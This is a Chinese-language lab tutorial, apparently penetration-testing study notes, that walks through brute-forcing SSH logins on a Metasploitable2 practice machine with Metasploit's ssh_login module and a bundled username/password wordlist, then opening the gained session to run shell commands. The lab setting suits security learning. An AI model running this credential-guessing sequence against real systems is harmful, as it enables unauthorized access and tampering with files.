使用Kali上的Metasploit获取ssh登录到靶机权限

前置条件

靶机:metasploitable2

靶机IP:192.168.88.137

初始密码是:msfadmin/msfadmin

kali安装的镜像为:kali-linux-2019.1a-amd64.iso

KaliIP为:192.168.88.132

使用Metasploit获取mysql登录密码

进入Metasploit的控制台执行命令:

msfconsole

使用Kali上的Metasploit获取ssh登录到靶机权限_第1张图片

查询ssh服务相关模块信息,选择如下模块:

use  auxiliary/scanner/ssh/ssh_login

查看ssh_login配置参数选项:

show options

设置远程服务RHOSTS参数值:

set RHOSTS 192.168.88.137

设置USERPASS_FILE参数,本文使用系统本身提供的:

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt

执行攻击命令:

exploit

上述操作截图如下:

使用Kali上的Metasploit获取ssh登录到靶机权限_第2张图片

退出攻击,CTRL+C,查看会话列表:sessions -l

使用Kali上的Metasploit获取ssh登录到靶机权限_第3张图片

进入指定会话:sessions -i 1,进入到会话1,执行shell命令如下截图:

使用Kali上的Metasploit获取ssh登录到靶机权限_第4张图片

使用Kali上的Metasploit获取ssh登录到靶机权限_第5张图片

上述操作时通过,ssh_login模块获取到靶机的ssh会话信息,通过会话可以操作靶机上的信息,删除创建文件等。

 

你可能感兴趣的:(安全渗透测试学习笔记)